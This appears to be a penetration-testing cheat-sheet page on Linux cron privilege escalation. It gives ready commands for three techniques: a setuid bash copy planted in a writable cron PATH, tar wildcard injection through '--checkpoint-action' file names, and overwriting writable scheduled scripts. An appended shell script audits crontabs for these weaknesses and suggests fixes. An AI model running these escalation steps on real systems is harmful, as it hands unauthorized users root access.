Scheduled Tasks

CRON PATHS:

Check the first path that cron is executing from, for example /home/user/. Check whether the scheduled task's file is present in that directory. If it is not present, then create it.

If the file has extension .sh and in /home/user/ path:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/file.sh
# Go to /tmp and wait for the scheduled task to run. Check the time using ls -la
# Then run the following:
/tmp/bash -p

WILDCARDS:

Check whether any task runs a command with a wildcard ( * ).

Suppose tar is running with wildcard: tar czf /tmp/backup.tar.gz *

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > runme.sh
chmod +x runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
# Wait for the scheduled task to run
/tmp/bash -p

FILE OVERWRITES:

Check if we have write permissions on any of the scheduled tasks. Then overwrite the file with a reverse shell. (Important: before overwriting the file, always copy the contents of the original file to some location.)

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > runme.sh
/tmp/bash -p
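
The three conditions above (a writable directory in the cron PATH, a wildcard in a scheduled command, a writable scheduled file) can be checked from the administrator's side. The following audit is an added example, not part of the original page; the function names, finding labels and the sandbox built in demo() are assumptions made for illustration.

```sh
#!/bin/sh
# Added defensive example: audit an /etc/crontab-style file for the three
# weaknesses on this page. Every path created in demo() is constructed.
# Succeeds if the path exists and its mode grants group or other write access.
# Symlinks are followed; ownership and ACLs are not examined.
loose() {
    [ -e "$1" ] || return 1
    case $(ls -ldL "$1") in ?????w*|????????w*) return 0 ;; esac
    return 1
}

# Prints CRON_PATH, WILDCARD and WRITABLE_FILE findings, one per line.
# Only the first word of a command is resolved; @reboot-style lines are skipped.
audit_crontab() {
    file=$1 path_var=/usr/bin:/bin
    while IFS= read -r line; do
        case $line in
            ''|'#'*|@*) continue ;;
            PATH=*) path_var=${line#PATH=}; continue ;;
            [A-Za-z_]*) continue ;;             # other environment assignments
        esac
        set -f; set -- $line; set +f            # split fields without globbing
        [ $# -ge 7 ] || continue
        user=$6; shift 6; cmd="$*"; first=$1; target=
        case $cmd in *'*'*) echo "WILDCARD: $user runs: $cmd" ;; esac
        case $first in
            */*) target=$first ;;
            *)  old_ifs=$IFS; IFS=:; set -f
                for dir in $path_var; do
                    if loose "$dir"; then echo "CRON_PATH: writable $dir is searched for $first"; break; fi
                    if [ -e "$dir/$first" ]; then target=$dir/$first; break; fi
                done
                IFS=$old_ifs; set +f ;;
        esac
        if loose "$target"; then echo "WRITABLE_FILE: $user runs $target"; fi
    done < "$file"
}

# Constructed sandbox (not real system data) exhibiting all three findings.
demo() {
    d=$(mktemp -d); mkdir -p "$d/home/user" "$d/opt"
    chmod 777 "$d/home/user"                    # writable dir, first in cron PATH
    printf '#!/bin/sh\n' > "$d/opt/clean.sh"; chmod 766 "$d/opt/clean.sh"
    printf '%s\n' "PATH=$d/home/user:/usr/bin:/bin" \
        '* * * * * root overwrite.sh' \
        '*/5 * * * * root tar czf /tmp/backup.tar.gz *' \
        "* * * * * root $d/opt/clean.sh" > "$d/crontab"
    audit_crontab "$d/crontab"; rm -rf "$d"
}
demo
```

Run `audit_crontab /etc/crontab` on a real host. Each finding maps to a fix: remove writable directories from the cron PATH or call commands by absolute path, replace `*` with an explicit file list or `./*`, and make scheduled scripts writable by root only.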

Last updated 4 years ago